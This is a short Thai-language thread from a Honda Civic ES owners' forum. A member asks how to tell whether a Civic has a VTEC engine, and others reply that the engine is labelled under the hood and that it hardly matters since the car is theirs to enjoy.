พฤหัส, 19 มกรา 2012 10:01 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
เปิดฝากระโปรงดูก็ได้ครับ มันมีเขียนหน้าเครื่องเลย
ได้รับคำขอบคุณจาก: BananaBoat  hotmail  khem_hatyai 
phichetza

ชื่อเล่น: เชษ

เข้าร่วม: 17 ตุลา 2011
ตอบ: 1590

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1420
ให้คำขอบคุณ: 3612

พฤหัส, 19 มกรา 2012 10:36 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
อ่านแล้วซึ้ง
Thanwa

ชื่อเล่น: แจ๊ค

เข้าร่วม: 01 ธันวา 2010
ตอบ: 890

Guru ES
Guru ES

ได้รับคำขอบคุณ: 293
ให้คำขอบคุณ: 729

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 19 มกรา 2012 10:54 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
อย่าไปสนเลยครับ...ยิ่งเราเปรียบเทียบกับคนอื่นเราจะรู้สึกว่ารถเราด้อยกว่า
เมื่อเราซื้อมาแล้ว นี่คือรถของเรา แต่งให้เต็มที่เลยครับ
ไม่มีใครสนหรอกครับว่ารถเราเครื่องอะไร
รถเราสวยอยู่แล้ว
ได้รับคำขอบคุณจาก: BananaBoat  hotmail  b4829  khem_hatyai 
kai2003

Guru ES
Guru ES

พฤหัส, 19 มกรา 2012 13:39 - ผมจะรู้ได้ไงครับว่ารถ civic คันนี้เครื่อง v-tech หรือเปล่า
Thanwa พิมพ์ว่า:
อย่าไปสนเลยครับ...ยิ่งเราเปรียบเทียบกับคนอื่นเราจะรู้สึกว่ารถเราด้อยกว่า
เมื่อเราซื้อมาแล้ว นี่คือรถของเรา แต่งให้เต็มที่เลยครับ
ไม่มีใครสนหรอกครับว่ารถเราเครื่องอะไร
รถเราสวยอยู่แล้ว

+1000 ยังไงก็รถเราครับ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.